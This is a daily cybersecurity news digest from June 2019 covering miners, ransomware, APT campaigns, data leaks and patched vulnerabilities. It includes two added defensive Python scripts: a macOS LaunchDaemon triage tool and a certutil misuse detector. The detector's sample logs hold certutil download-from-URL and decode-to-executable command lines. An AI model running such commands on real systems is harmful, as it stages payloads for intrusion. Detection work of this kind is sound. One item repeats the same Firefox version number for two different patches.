Silobreaker Daily Cyber Digest – 21 June 2019
LoudMiner bundled with pirated VST software
- Researchers at ESET observed that the miner, dubbed LoudMiner, has been distributed for macOS and Windows since 2018. LoudMiner mines Monero and comes bundled with VST software. It uses QEMU on macOS, and VirtualBox on Windows to mine on a Tiny Core Linux virtual machine.
- Researchers observed 137 VST-related applications available on a single WordPress-based domain. The frequently updated applications, assumed to all be Trojanized, are hosted on 29 external servers.
- Four different versions of LoudMiner were uncovered, three for macOS and one for Windows. Forum threads showed a user complaining that LoudMiner was taking up 100% of their CPU.
Source (Includes IOCs)
New Mac cryptocurrency miner discovered
- Researchers at Malwarebytes Labs first found the miner, dubbed Bird Miner, in a cracked installer for the music production software Ableton Live which is hosted on piracy site VST Crack.
- When downloaded, the malware drops a number of files, three of which are launch daemons that run three different shell scripts. If the scripts detect that Activity Monitor is running, Bird Miner bails out. If no Activity Monitor is detected, Bird Miner runs two separate miners from two separate 130 MB QEMU image files, which obfuscates the miner’s code.
Source (Includes IOCs)
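The launch-daemon behaviour described above is something a defender can triage on a Mac: a LaunchDaemon whose program is a shell interpreter running a script from a writable, non-system location, set to run at load and be kept alive, deserves a look. The script below is an added example (not code from Malwarebytes or from the original digest) that applies those heuristics to constructed LaunchDaemon plists built inline; the labels, paths and trusted-prefix list are assumptions made for the illustration, not real Bird Miner artefacts.

```python
import plistlib
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Interpreters that, as ProgramArguments[0], mean "run a script" rather than a compiled daemon.
SHELLS = {"sh", "bash", "zsh"}
# Assumed-trusted locations for a script launched by a daemon (heuristic, tune per fleet).
TRUSTED_PREFIXES = ("/System/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/")


@dataclass
class DaemonFinding:
    path: str
    label: str
    reasons: List[str] = field(default_factory=list)


def sample_plists() -> Dict[str, bytes]:
    """Constructed LaunchDaemon plists for an offline run (illustrative, not real files).

    In practice the bytes come from reading /Library/LaunchDaemons/*.plist.
    """
    def build(label, args, run_at_load=True, keep_alive=False):
        return plistlib.dumps({"Label": label, "ProgramArguments": args,
                               "RunAtLoad": run_at_load, "KeepAlive": keep_alive})

    return {
        "/Library/LaunchDaemons/com.example.audio-helper.plist":
            build("com.example.audio-helper",
                  ["/bin/sh", "/usr/local/share/audio/start.sh"], keep_alive=True),
        "/Library/LaunchDaemons/com.example.sync.plist":
            build("com.example.sync", ["/bin/bash", "/private/tmp/.sync.sh"]),
        "/Library/LaunchDaemons/com.example.agentd.plist":
            build("com.example.agentd", ["/usr/libexec/example-agentd", "--daemon"]),
        "/Library/LaunchDaemons/com.example.repair.plist":
            build("com.example.repair", ["/bin/sh", "/System/Library/Scripts/repair.sh"]),
    }


def triage(path: str, data: bytes) -> Optional[DaemonFinding]:
    """Return a finding when the daemon runs a shell script from an untrusted place."""
    plist = plistlib.loads(data)
    args = plist.get("ProgramArguments") or []
    label = plist.get("Label", "<no label>")
    if not args:
        return None
    reasons: List[str] = []
    program = args[0].rsplit("/", 1)[-1]
    if program in SHELLS and len(args) > 1:
        script = args[1]
        if not script.startswith(TRUSTED_PREFIXES):
            reasons.append(f"shell script outside trusted paths: {script}")
        if script.rsplit("/", 1)[-1].startswith("."):
            reasons.append("hidden script name")
    # Persistence flags only matter once something else looked odd.
    if reasons and plist.get("RunAtLoad"):
        reasons.append("RunAtLoad")
    if reasons and plist.get("KeepAlive"):
        reasons.append("KeepAlive (restarted if killed)")
    return DaemonFinding(path, label, reasons) if reasons else None


def scan_daemons(plists: Dict[str, bytes]) -> List[DaemonFinding]:
    """Triage every plist and keep only the ones with reasons."""
    return [f for f in (triage(p, d) for p, d in plists.items()) if f]


if __name__ == "__main__":
    for finding in scan_daemons(sample_plists()):
        print(finding.path, finding.label, "; ".join(finding.reasons))
```

Of the four constructed daemons, the two that run scripts from /usr/local and /private/tmp are reported; the compiled daemon under /usr/libexec and the script under /System are not. The trusted-prefix list is deliberately narrow, so expect to whitelist legitimate vendor daemons when running this across a real fleet.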
Necurs botnet spam campaign discovered
- Observed by researchers at Trustwave, the Necurs botnet spam campaign delivers an HTML redirector, used to perform a DNS query to obtain the spammer’s DNS TXT record and subsequently execute it. The victim is then redirected to scam websites and receives unwanted advertisements.
- The current advertisements delivered are described by researchers as harmless, but it would be trivial for operators to switch what is delivered to something more harmful.
Source (Includes IOCs)
Managed Service Providers hacked to deliver ransomware
- It is alleged that at least three managed service providers have been breached, with their toolset being used to deploy Sodinokibi ransomware on customers’ systems, primarily via Webroot SecureAnywhere. Upon investigation, it appears that hackers breached the MSPs by exploiting exposed Remote Desktop endpoints, before elevating their privileges and uninstalling antivirus products.
- Consequently, Webroot forcibly enabled 2FA on all SecureAnywhere accounts. Chad Bacher, SVP of Products at Webroot, stated that their Advanced Malware Removal team discovered a ‘small number of customers were impacted by a threat actor exploiting a combination of customers’ weak cyber hygiene practices around authentication and RDP’.
Iran allegedly targets US organisations in newly discovered campaign
- CrowdStrike and Dragos reportedly discovered a new campaign last week by APT33 leveraging targeted phishing emails against US targets, including the Department of Energy and US national labs. FireEye has also reported on a newly discovered Iranian phishing campaign targeting government agencies and private sectors in the US and Europe, though they do not specifically mention APT33.
- In the recent campaign, hackers sent potential victims phishing emails posing as job openings from the Council of Economic Advisors. The email contained a link that, if clicked, opened an HTML application that launched a Visual Basic script that installed Powerton malware.
- The tactics, techniques and procedures displayed in this campaign match the previous behaviour associated with APT33. It is believed that the latest campaign is in some way connected to the current political tensions between Iran and the US.
Ransom payment demanded by DanaBot banking Trojan in European campaigns
- Check Point researchers observed the DanaBot Trojan being used to drop ransomware written in Delphi. DanaBot, first tracked in August 2018, continues to grow in capability; the latest ransomware addition was spotted in May 2019 and is a simple ‘copy-paste’ encryptor.
Cryptocurrency-Mining Botnet Malware delivered through Android Debug Bridge
- Researchers at Trend Micro observed that the attack takes advantage of ADB ports which by default have no authentication. The bot is then able to spread to any system that has had a previous SSH connection with the host.
- The attack uses the ADB command shell to change the attacked system’s working directory and then determines whether it has entered a honeypot. The bot then uses wget to download the payload, which can be one of three downloadable miners, all of which are downloaded from the same URL.
- The malware has been observed in 21 countries, with the highest percentage found in South Korea.
Source (Includes IOCs)
CISA warns of Department of Homeland Security phishing scam
- The Cybersecurity and Infrastructure Security Agency (CISA) released a statement on June 18th, 2019, warning of a phishing campaign that tricks users by appearing to be a DHS notification.
- The email campaign looks like a National Cyber Awareness System alert and contains a malicious attachment containing malware.
Turla utilizes custom malware and custom toolsets in ongoing campaign
- Researchers at Symantec observed Russian espionage group Turla APT launching a series of campaigns against governments and international organizations in Europe, South America, the Middle East, South Asia and Southeast Asia.
- The group’s activity over the last eighteen months can be divided into three different campaigns, characterised by differing toolsets. The first uses the Neptun backdoor installed on Microsoft Exchange servers. Neptun can be used to download tools, upload files and execute shell commands. The second utilized Meterpreter alongside a custom backdoor called photobased[.]dll and a custom RPC backdoor. The third deployed a custom RPC backdoor to execute PowerShell scripts.
- Symantec researchers also observed an instance of Turla hacking into the servers of APT34. Turla used APT34’s C2 servers to drop their own malware on computers that were infected by APT34. Symantec researchers stated that Turla’s presence on these servers went undetected.
Source (Includes IOCs)
Leaks and Breaches
Village of Palm Springs suffered cyber attack
- Palm Springs Village Manager Rich Reade stated that the Village of Palm Springs was hit by a cyber-attack over a year ago. According to Reade, a phishing email was sent, that infected their network with malware dubbed Amnesia 3.
- The hackers reportedly split the ransom request into three decryption keys. The village paid for the first and second, but upon realising that these did not decrypt all of their files, refused to pay for the third. Approximately $1,200 worth of Bitcoin was sent to the hackers.
Medical database suffers data leak
- Discovered by the security team at vpnMentor, the leaked MongoDB database contained information on 391,649 Vascepa prescriptions, as well as other data about 78,000 patients who were prescribed the drug in the past. The database was accessible without a password, and data within included full names, addresses, email addresses, and data about the prescribing doctor.
- It is suspected that the database belongs to ConnectiveRx due to tags within the data. ZDNet reached out to various organisations, but none have issued a response.
Desjardins Group data leak exposes information of 2.9 million members
- Desjardins Group, the largest association of credit unions in North America, became aware of a data leak on June 14th, 2019. The group said that they were made aware thanks to the Laval Police, who informed them that the details of more than 2.9 million members had been disclosed.
- Of the 2.9 million members, 2.7 million were personal members and 173,000 were business members. Leaked business details included business names, business addresses, business phone numbers, owners’ names, and more. Disclosed personal details included names, dates of birth, social insurance numbers, details of banking habits, and more.
Romanian hospitals affected by BadRabbit 4 ransomware
- The Romanian Intelligence Service (SRI) announced that four hospitals were targeted by BadRabbit 4 ransomware. The impacted hospitals include the Victor Babeş Infectious Diseases Hospital in Bucharest and three other facilities located in Huşi, Dorohoi and Cărbuneşti.
- According to health minister Sorina Pintea, although hospital systems were impacted, the incident does not impact individual patients.
Microsoft patches spoofing vulnerability discovered in Outlook for Android
- The flaw, tracked as CVE-2019-1105, could be exploited by an authenticated hacker by sending a specially crafted email to the victim. Successful exploitation would allow an attacker to perform a cross-site scripting attack and run scripts in the context of the current user.
Vulnerability discovered in Dell SupportAssist
- Identified as CVE-2019-12280, the privilege escalation vulnerability exists in Dell SupportAssist for Business PCs version 2.0.1 and Dell SupportAssist for Home PCs version 3.2.2. The flaw could allow malware and rogue users to gain administrative privileges, because the software insecurely loads .dll files when run, including unsigned code from user folders.
- Dell have released a patch for the software, urging users to update to the latest version.
Used Nest cameras permit access for previous owners
- A member of Facebook Winks Users group discovered that after selling their Nest camera, they were still able to access live images of the camera at the new property, even after a factory reset.
- This was reported to Google, who have since rolled out a fix that will automatically update all Nest cameras.
Cisco announces multiple vulnerabilities
- Cisco announced 26 vulnerabilities in the past 48 hours, including two critical flaws: CVE-2019-1625, a Cisco SD-WAN solution privilege escalation flaw, and CVE-2019-1848, an authentication bypass issue in Cisco DNA Center. CVE-2019-1625 could allow an attacker to make system configuration changes.
Flaw patched in BIND
- A race condition vulnerability, tracked as CVE-2019-6471, has been patched in BIND. It could have allowed an attacker to cause a denial-of-service condition on a target device.
Firefox releases patch for second zero-day used against cryptocurrency firms
- Following the release of patch 67.0.4 that addressed CVE-2019-11707, Mozilla has released patch 67.0.4 to fix CVE-2019-11708.
- CVE-2019-11708 is a sandbox escape flaw that was used in a chained attack in combination with CVE-2019-11707. The chained attack allowed attackers to remotely execute malicious code on target computers. The zero-day was used to target Coinbase employees and other cryptocurrency firms.
- In a separate case, a Mac user reported to researcher Patrick Wardle that he too was targeted. The user received a phishing email containing a URL which, once clicked, proceeded to download Netwire RAT, which grants an attacker full access to the infected device.
NASA’s Jet Propulsion Laboratory still has security weaknesses
- The Office of Inspector General has found that NASA’s Jet Propulsion Laboratory (JPL) suffers from multiple security weaknesses. The research centre’s security controls were audited after the organisation suffered a security breach in April 2018. The breach was the result of a Raspberry Pi, not authorized to be linked to the JPL network, being targeted by hackers.
- The report states that the existing multiple IT security control weaknesses reduce JPL’s ability to ‘prevent, detect, and mitigate attacks targeting its systems and networks’.
Over half of phishing sites use HTTPS
- Researchers at PhishLabs observed that by the end of Q1 2019, 58% of phishing sites were employing HTTPS. HTTPS is increasingly used by threat actors to prevent browsers from flagging their sites as suspicious and to act as a social engineering tool, convincing visitors to divulge information.
CertUtil tool reportedly being used by hacker groups in the wild
- SentinelOne reported that the admin command line tool CertUtil[.]exe is being used by hackers as a replacement for PowerShell, for tasks such as downloading a file from a remote URL, and encoding and decoding a Base64-obfuscated payload.
- SentinelOne’s report includes an in-depth analysis of how hacker groups are using this tool in the wild.
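Both uses named above leave a distinctive command line on the endpoint, which makes them a straightforward detection for anyone collecting process-creation telemetry. The following script is an added example, not code from SentinelOne or from the original digest: it parses constructed process-creation log lines (a simplified key=value form, not real telemetry) and flags certutil.exe runs that use the documented `-urlcache` switch together with a URL, or the `-encode`/`-decode` switches. The log format, sample paths and severity labels are assumptions made for the illustration.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample process-creation log lines (illustrative, not real telemetry).
SAMPLE_LOGS = [
    'Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil.exe -urlcache -split -f http://example.invalid/stage.txt C:\\Users\\Public\\stage.txt"',
    'Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -decode C:\\Users\\Public\\stage.txt C:\\Users\\Public\\stage.exe"',
    'Image=C:\\Windows\\System32\\certutil.exe CommandLine="CertUtil.exe /encode C:\\Users\\Public\\secret.bin C:\\Users\\Public\\secret.txt"',
    'Image=C:\\Windows\\System32\\certutil.exe CommandLine="certutil -addstore Root C:\\certs\\corp-ca.cer"',
    'Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe -decode notes.txt"',
]


@dataclass
class Finding:
    line_no: int
    technique: str
    severity: str
    command_line: str


# key=value pairs; a quoted value may contain spaces.
_FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')
# certutil accepts switches with either "-" or "/".
_SWITCH_RE = re.compile(r'(?:^|\s)[-/](\w+)')
_URL_RE = re.compile(r'\b(?:https?|ftp)://\S+', re.IGNORECASE)


def parse_line(line: str) -> dict:
    """Split a key=value log line into a dict, keeping spaces inside quoted values."""
    fields = {}
    for m in _FIELD_RE.finditer(line):
        key, raw, quoted = m.group(1), m.group(2), m.group(3)
        fields[key] = quoted if quoted is not None else raw
    return fields


def classify_certutil(command_line: str) -> Optional[Tuple[str, str]]:
    """Map a certutil command line to (technique, severity), or None if it looks routine."""
    switches = {s.lower() for s in _SWITCH_RE.findall(command_line)}
    has_url = _URL_RE.search(command_line) is not None
    if "urlcache" in switches and has_url:
        return ("download_from_url", "high")
    if switches & {"decode", "encode"}:
        return ("base64_encode_or_decode", "medium")
    return None


def scan(lines: List[str]) -> List[Finding]:
    """Return one finding per certutil.exe process whose command line matches a rule."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        fields = parse_line(line)
        image = fields.get("Image", "")
        # Match on the image name, not on the command line text, so a renamed
        # binary or an unrelated program mentioning "-decode" is not confused with certutil.
        if image.rsplit("\\", 1)[-1].lower() != "certutil.exe":
            continue
        result = classify_certutil(fields.get("CommandLine", ""))
        if result:
            findings.append(Finding(n, result[0], result[1], fields["CommandLine"]))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f.line_no}: {f.technique} [{f.severity}] {f.command_line}")
```

On the constructed sample, the download and the two encode/decode invocations are reported while the certificate-store operation and the notepad line are not. A base64 decode of a file that was fetched moments earlier by the same tool is a sequence worth correlating across lines, which the per-line rule above deliberately leaves to the SIEM.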
New ‘Process Reimaging’ technique can bypass endpoint security solutions
- McAfee researchers developed a new post-exploitation technique, dubbed ‘Process Reimaging’ that is similar to ‘Process Doppelganging’ or ‘Process Hollowing’ techniques, but is easier to execute as it requires no code injection.
- The technique was successfully tested against the current version of Microsoft Windows and Windows Defender. However, the researchers state that it is likely to work on any endpoint security vendor or product implementing the APIs outlined in their report.
- The process works by leveraging inconsistencies in how Windows OS determines FILE_OBJECT locations. This affects the ability of endpoint security solutions to identify correct binaries in malicious processes.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.